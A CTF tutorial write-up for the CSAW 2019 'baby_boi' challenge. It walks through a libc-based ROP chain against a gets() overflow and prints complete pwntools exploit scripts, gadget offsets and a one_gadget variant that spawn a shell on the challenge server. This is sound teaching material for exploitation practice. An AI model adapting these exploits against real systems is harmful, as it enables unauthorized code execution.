baby_boi (A Textbook CTF ROP Tutorial)

Welcome to pwn.

nc pwn.chal.csaw.io 1005

Ahhh, CSAW CTF. Amidst all the other CTFs where we’re competing with security professionals who probably have decades of experience and who follow security developments for a living or whatever, there remains a competition where scrubs like me can apply our extremely basic CTF skills and still feel kinda smart by earning points. Now that I’ve graduated and am no longer eligible, our team was pretty small and I didn’t dedicate the full weekend to the CTF, but it means I got to do the really easy challenges in the categories that I was the worst at, by which I mean pwn.

baby_boi is pretty much the simplest possible modern ROP (the modern security protections NX and ASLR are not artificially disabled, but you get everything you need to work around them). We even get source code.

#include <stdio.h>
#include <stdlib.h>

int main(int argc, char **argv[]) {
  char buf[32];
  printf("Hello!\n");
  printf("Here I am: %p\n", printf);
  gets(buf);
}

So there’s nothing novel here for experienced pwners, but I feel like there is a shortage of tutorials that walk you through how to solve a textbook ROP the way you’d want to solve it in a CTF, so here is a writeup.

As I said, pwns are really not the CTF category I contribute to, which is why this is only the second ROP I did in an actual contest. But since I wrote up my first ROP (PLC) with some conceptual detail and there are zillions of other ROP tutorials on the internet, I will assume understanding of how ROP works conceptually and just focus on the technical execution.

Setup

Here are all the tools we need:

A Linux machine. A VM is fine. You might want one even if your machine is already running Linux, so that you reduce the chances of CTF stuff messing with the rest of your machine.
Python, and the Python library pwntools, which is the library everybody and their mom use for interacting with binaries in CTFs. It’s extremely useful. As of time of writing it’s Python 2 only; there exists a Python 3 fork that is no longer maintained, but also works well enough. I wrote my script against the Python 3 fork, but the differences from Python 2 are small. (Hopefully we’ll have a supported Python 3 version before Python 2 stops being supported…) It also comes with a few very useful command-line utilities, particularly checksec.
The Python utility ROPgadget, which we will use for finding ROP gadgets.
(optional, but useful) The Ruby utility one_gadget.
Some other utilities that I think might come with Linux, but if not you should know what to Google: file, gdb, readelf, strings. In general I’d suggest setting up gdb with pwndbg and voltron, but I don’t think you need anything other than basic gdb functionality (if that) for this challenge.

Okay, let’s get ROPping.

Recon

The first thing to do is download the executable and libc. The second thing to do is probably run the basic diagnostic utilities against it, just to see what we’re up against. (checksec comes with pwntools.)

$ file baby_boi
baby_boi: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/l, for GNU/Linux 3.2.0, BuildID[sha1]=065da8fff74608a5758babd74e18e7e046054d84, not stripped

$ checksec baby_boi
[*] '/home/akriloth/Dropbox/prog/ctf/csaw/2019/baby_boi'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE

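Nothing unusual. NX is on, so we can’t shellcode, but that’s what we’d expect anyway. There is no stack canary, so nothing detects the overflow before main returns, and without PIE the binary itself loads at a fixed address, so neither of those gets in our way.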

Stack Smashing

gets lets us smash the stack as far as we want, but one thing we always need to know is how far down the stack the first return address we can smash is, so we know how much padding to add. You can be a diligent, disciplined hacker and count how much memory is allocated on the stack (32 bytes, for buf) and add the 8 bytes used to store the old rbp to get the answer. You can also do it the dumb but foolproof way by opening gdb, running the binary against input like aaaaaaaabbbbbbbbccccccccddddddddeeeeeeeeffffffffgggggggg, observing which address the executable segfaults on, and seeing which ASCII character it is made of.

However you decide to find out, you should conclude that we have to pad 40 bytes before the return address.
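As a rough illustration of the dumb-but-foolproof approach, here is a minimal Python sketch that builds the same kind of pattern and maps the 8 bytes that land in the return-address slot back to an offset. The helper names and the example value 0x6666666666666666 are hypothetical; substitute whatever value gdb actually shows you.

```python
import struct

def make_pattern(letters="abcdefg", width=8):
    """Build a pattern like b'aaaaaaaabbbbbbbb...', one letter per 8-byte slot."""
    return "".join(letter * width for letter in letters).encode("ascii")

def offset_of(value, pattern):
    """Return how many bytes precede the little-endian 8-byte `value` in `pattern`."""
    needle = struct.pack("<Q", value)  # x86-64 stores integers little-endian
    return pattern.index(needle)       # raises ValueError if the value is absent

pattern = make_pattern()
# Hypothetical value observed in gdb: eight 0x66 bytes, i.e. b"ffffffff".
padding = offset_of(0x6666666666666666, pattern)
print(padding)
```

If the letters f are what ends up in the return address, the padding is the 40 bytes of a through e that come before them. pwntools ships cyclic and cyclic_find for the same job with non-repeating patterns, which is handier when the buffer is large.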

Leaking libc

In more advanced challenges, to defeat ASLR, you have to first do a buffer overread or something else to leak an address in libc. Here, though, the libc leak is handed to us on a silver platter, in the form of a pointer to printf. A typical interaction will give something like:

$ nc pwn.chal.csaw.io 1005
Hello!
Here I am: 0x7f3c0a0b3e80

Let’s figure out its offset in libc, by grepping the output of readelf on the provided libc:

$ readelf -s libc-2.27.so | grep ' printf@'
   627: 0000000000064e80   195 FUNC    GLOBAL DEFAULT   13 printf@@GLIBC_2.2.5

So printf is at offset 0x64e80 in the server’s libc. (As confirmation that this is correct, you’ll note that the last three hex digits are the same as the address we got above, because ASLR only randomizes addresses with a granularity of 0x1000.) Therefore, we can calculate the runtime address of anything else in libc by taking the pointer we’re given, subtracting 0x64e80, and adding the fixed offset calculated from our copy of libc.
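The arithmetic is simple enough to sketch in a few lines of Python. The function names here are made up for illustration, and the leaked value is just the sample from the interaction above; it will be different on every run.

```python
PRINTF_OFFSET = 0x64e80  # from the readelf output above

def libc_base_from_leak(leaked_printf):
    """Compute where libc was loaded, given the runtime address of printf."""
    base = leaked_printf - PRINTF_OFFSET
    # ASLR moves libc by whole pages, so a correct base ends in three zero hex digits.
    if base & 0xfff != 0:
        raise ValueError("base is not page-aligned; wrong libc or wrong symbol?")
    return base

def resolve(base, offset):
    """Turn an offset inside libc into a runtime address."""
    return base + offset

leaked = 0x7f3c0a0b3e80  # sample leak from the session above
base = libc_base_from_leak(leaked)
print(hex(base))
```

The page-alignment check is a cheap sanity test: if it fails, you are probably looking at the wrong libc or the wrong symbol.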

Note: You can also acquire this from directly inside your exploit script with pwntools, as well as let pwntools handle some offset calculations. This requires slightly more setup as you have to install more things to give pwntools the capability, and I’m not used to doing it, but it’s probably worth knowing.

from pwn import *

libc = ELF('libc-2.27.so')
print(hex(libc.symbols['printf']))  # offset of printf in libc; should match the readelf output above

Building the ROP Chain

Let’s use ROPgadget to look for gadgets. We’ll pick out the ones we want later. (This might take a few seconds or minutes, so we’d want to save the results into a text file and search it with our favorite text editor.)

$ ROPgadget --binary libc-2.27.so > gadgets.txt

Recall the bog-standard ROP payload, exactly the same one I used in PLC: we want to call the syscall execve("/bin/sh", 0, 0), which gives us a shell, so we want to:

set rax to the syscall number of execve (on a 64-bit machine), which is 59 or 0x3b;
set rdi to a pointer to the string “/bin/sh”;
set rdx to 0;
set rsi to 0.

Our stack smash is powerful enough that we don’t have to worry about anything like avoiding null bytes in our chain, so the simplest, most reliably findable ROP gadgets we can use to achieve our goal are just pop instructions for each of these registers. So, you can fire up your favorite text editor and look in gadgets.txt for useful gadgets. For example, you can find the pop rax ; ret gadget (if one exists) with a regex search for : pop rax ; ret$. It does exist:

0x00000000000439c8 : pop rax ; ret
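If you would rather script the search than do it in an editor, something like the following Python sketch works on lines in the format ROPgadget prints. The find_gadget helper is my own naming, and the first sample line (with ret 0x8) is invented purely to show why the end-of-line anchor matters; the other lines are the ones from this writeup.

```python
import re

SAMPLE_LINES = [
    "0x0000000000001234 : pop rax ; ret 0x8",  # hypothetical near-miss, not a real gadget
    "0x00000000000439c8 : pop rax ; ret",
    "0x000000000002155f : pop rdi ; ret",
]

def find_gadget(lines, instructions):
    """Return the offset of the first line whose gadget is exactly `instructions`."""
    # The trailing `$` rejects longer gadgets that merely start the same way.
    pattern = re.compile(r"^(0x[0-9a-f]+) : " + re.escape(instructions) + r"$")
    for line in lines:
        match = pattern.match(line.strip())
        if match:
            return int(match.group(1), 16)
    return None

print(hex(find_gadget(SAMPLE_LINES, "pop rax ; ret")))
```

To run it on the real output, pass it an open file instead of the sample list, e.g. find_gadget(open("gadgets.txt"), "pop rdi ; ret").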

This gadget is at offset 0x439c8. For the full exploit, we decide that we want to set up the stack like this (top to bottom), where parentheses denote the location of the ROP gadget. This also happens to be the exact same setup as in PLC, conveniently. (We could just as well have used separate pop rdx ; ret and pop rsi ; ret gadgets, but given that we managed to find a gadget that does both, there’s no reason not to use it.)

(pop rax ; ret)
0x3b
(pop rdi ; ret)
(pointer to "/bin/sh")
(pop rdx ; pop rsi ; ret)
0
0
(syscall)

As above, all the locations of the gadgets are in gadgets.txt, so we just need to write down their offsets:

0x00000000000439c8 : pop rax ; ret
0x000000000002155f : pop rdi ; ret
0x00000000001306d9 : pop rdx ; pop rsi ; ret
0x00000000000d2975 : syscall ; ret
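To convince yourself that this layout really loads the registers as intended, here is a toy Python simulation of how ret and pop walk the stack. It is only a sketch: the base address is hypothetical, the simulate helper is my own, and it models nothing beyond these four gadgets. The "/bin/sh" offset is the one looked up with strings a little further down.

```python
import struct

# Offsets within libc, as listed above.
POP_RAX, POP_RDI, POP_RDX_RSI, SYSCALL = 0x439c8, 0x2155f, 0x1306d9, 0xd2975
BIN_SH = 0x1b3e9a  # offset of "/bin/sh", found with strings later in this writeup

# Which registers each gadget pops, in order, before its `ret`.
GADGET_POPS = {
    POP_RAX: ["rax"],
    POP_RDI: ["rdi"],
    POP_RDX_RSI: ["rdx", "rsi"],
    SYSCALL: [],
}

def simulate(chain, base):
    """Walk a chain of 8-byte little-endian words the way `ret` and `pop` would."""
    words = [word for (word,) in struct.iter_unpack("<Q", chain)]
    regs, i = {}, 0
    while i < len(words):
        gadget = words[i] - base      # `ret` pops this address into rip
        i += 1
        for reg in GADGET_POPS[gadget]:
            regs[reg] = words[i]      # each `pop` consumes the next stack word
            i += 1
        if gadget == SYSCALL:
            break                     # the kernel takes over from here
    return regs

base = 0x7f0000000000  # hypothetical libc base for the simulation
layout = [base + POP_RAX, 0x3b, base + POP_RDI, base + BIN_SH,
          base + POP_RDX_RSI, 0, 0, base + SYSCALL]
chain = b"".join(struct.pack("<Q", word) for word in layout)
regs = simulate(chain, base)
print({name: hex(value) for name, value in regs.items()})
```

By the time the simulated chain reaches syscall, rax holds 0x3b, rdi points at the string, and rdx and rsi are both 0, which is exactly the register state execve("/bin/sh", 0, 0) needs.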

The one thing we still need to look up is the string /bin/sh. You can find it with the following command.

$ strings -tx libc-2.27.so | grep /bin/sh
 1b3e9a /bin/sh

(-t prints positions; with x as its argument, the positions are formatted in hexadecimal.)
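The same lookup can be done from Python by searching the raw bytes of the file. This is a minimal sketch with a helper name of my own choosing; it runs against a tiny synthetic blob so that it works without the real libc on hand.

```python
def find_offsets(blob, needle):
    """Return every file offset at which `needle` occurs in `blob`."""
    offsets, start = [], 0
    while True:
        index = blob.find(needle, start)
        if index == -1:
            return offsets
        offsets.append(index)
        start = index + 1

# Synthetic stand-in for the file contents, so the sketch runs without libc.
blob = b"\x7fELF" + b"\x00" * 12 + b"/bin/sh\x00" + b"exit 0\x00"
# Searching with the trailing NUL makes sure we match a complete C string.
found = find_offsets(blob, b"/bin/sh\x00")
print([hex(offset) for offset in found])
```

Against the real thing you would read the file with open("libc-2.27.so", "rb").read() and would expect to see the same 0x1b3e9a that strings reported. If you have pwntools set up to parse the ELF, next(libc.search(b"/bin/sh")) is the usual shortcut.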

Sidebar: `one_gadget`

When you have control of one return address, one_gadget is usually worth checking. It identifies single locations you can jump to that might give you a shell directly, with no further gadgets, if other constraints are also satisfied. It’s often faster to just try jumping to them and seeing if you get a shell, instead of manually seeing if the constraints are satisfied. In this case I don’t think they were. (Update: I could have sworn I tried all three one_gadget addresses during the contest and none of them worked, but they all work for me now, and judging by other writeups they worked for other people too.)

$ one_gadget libc-2.27.so
0x4f2c5 execve("/bin/sh", rsp+0x40, environ)
constraints:
  rcx == NULL

0x4f322 execve("/bin/sh", rsp+0x40, environ)
constraints:
  [rsp+0x40] == NULL

0x10a38c execve("/bin/sh", rsp+0x70, environ)
constraints:
  [rsp+0x70] == NULL

The Full Exploit

import re  # used below to parse the leaked pointer

from pwn import *

# One of the many magic things pwntools does is that you can accept arguments
# from the environment or command line with zero setup, e.g. run this script as
#
#     $ python exploit.py REMOTE
#
# to run it against the remote server, or don't pass REMOTE to run it locally.

if args['REMOTE']:
    conn = remote('pwn.chal.csaw.io', 1005)
else:
    conn = process('baby_boi')

# conn.recvuntil("some string") is often more useful, but the input here
# doesn't have a super obvious terminator, so we read line by line.
conn.recvline()
ptr_line = conn.recvline()
ptr_text = re.search(r'0x([0-9a-z]+)', ptr_line.decode('utf-8')).group(1)
printf_ptr = int(ptr_text, 16)
libc_base = printf_ptr - 0x64e80

# The ROP chain, using these offsets as found above:
# 0x00000000000439c8 : pop rax ; ret
# 0x000000000002155f : pop rdi ; ret
# 0x00000000001306d9 : pop rdx ; pop rsi ; ret
# 0x1b3e9a /bin/sh
# 0x00000000000d2975 : syscall ; ret
exploit = b"a" * 40 # padding
exploit += p64(libc_base + 0x439c8) # `pop rax ; ret`
exploit += p64(59) # execve's syscall number, popped into rax
exploit += p64(libc_base + 0x2155f) # `pop rdi ; ret`
exploit += p64(libc_base + 0x1b3e9a) # "/bin/sh"
exploit += p64(libc_base + 0x1306d9) # `pop rdx ; pop rsi ; ret`
exploit += p64(0) # NULL, popped into rdx
exploit += p64(0) # NULL, popped into rsi
exploit += p64(libc_base + 0xd2975) # `syscall; ret`
exploit += b"\n"

# Send the exploit
conn.sendline(exploit)
# This should pop a shell, so now let us interact with the shell
conn.interactive()

And, the fun part:

$ python3 exploit.py REMOTE
[+] Opening connection to pwn.chal.csaw.io on port 1005: Done
[*] Switching to interactive mode
$ ls
baby_boi
flag.txt
$ cat flag.txt
flag{baby_boi_dodooo_doo_doo_dooo}

`one_gadget` version

This is the version I could have sworn I tried during the contest without success, but it works for me now. Everything should look familiar except for 0x4f2c5, which was one of the gadgets one_gadget found for us. The other one_gadgets at 0x4f322 and 0x10a38c also work.

import re  # used below to parse the leaked pointer

from pwn import *

if args['REMOTE']:
    conn = remote('pwn.chal.csaw.io', 1005)
else:
    conn = process('baby_boi')

conn.recvline()
ptr_line = conn.recvline()
ptr_text = re.search(r'0x([0-9a-z]+)', ptr_line.decode('utf-8')).group(1)
printf_ptr = int(ptr_text, 16)
libc_base = printf_ptr - 0x64e80
conn.sendline(b"a" * 40 + p64(libc_base + 0x4f2c5))
conn.interactive()

Bounded-Error Log

CSAW CTF Qualifiers 2019
